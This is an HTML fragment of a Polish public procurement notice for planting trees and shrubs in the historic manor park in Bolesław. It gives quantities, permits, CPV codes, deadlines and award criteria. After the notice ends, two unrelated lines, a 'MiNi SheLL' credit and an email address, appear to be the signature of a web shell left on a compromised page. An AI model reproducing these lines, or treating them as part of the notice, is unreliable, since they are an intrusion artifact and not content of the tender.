                <b>Nazwa: </b>Zadanie nr 2 - Zagospodarowanie terenu parku dworskiego w Bolesławiu  nasadzenia zieleni<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie nr 2 - Zagospodarowanie terenu parku dworskiego w Bolesławiu  nasadzenia zieleni
Zakres rzeczowy zadań obejmuje w szczególności :
wykonanie nasadzeń drzew i krzewów , wraz z ich minimalną 12 miesięczną pielęgnacją, licząc od dnia podpisania przez strony protokołu końcowego odbioru robót,  w ilości: 
- drzewa liściaste	- 	    6 szt.
- krzewy liściaste	- 	 485 szt.
- krzewy iglaste	 -	   12 szt.
Szczegółowy zakres zadania zawarty został w dokumentacji projektowej, w tym w przedmiarze robót.
1.  Prowadzenie Dziennika prac konserwatorskich.
2.  Opracowanie na  potrzeby Małopolskiego Konserwatora Zabytków dokumentacji powykonawczej (w ilości 2 egz.), obrazującej przebieg prac i zawierającej wskazania dla użytkownika.
3.Realizowanie zadania zgodnie z Pozwoleniem nr 22/16 z dnia 09.02.2016 r. na prowadzenie prac polegających na zabezpieczeniu, rekonstrukcji lub konserwacji parków zabytkowych oraz innego rodzaju zorganizowanej zieleni zabytkowej.
4.Realizowanie zadania zgodnie z pozwoleniem na budowę - decyzją nr 150/2016 z dnia 22.03.2016r. Starosty Olkuskiego. 
5.Prowadzenie prac pielęgnacyjnych w okresie gwarancyjnym, zgodnie z postanowieniami 
w dokumentacji projektowej.

Szczegółowy opis przedmiotu zamówienia  zawierają:
- przedmiary robót 
-specyfikacja techniczna wykonania i odbioru robót budowlanych
-dokumentacja projektowa.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>77310000-6, 77211600-8,
                    77211500-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>gwarancja</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>podpisanie umowy w 2017 r., a realizacja  od 20.03.2018 r. do 30.04.2018 r.<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com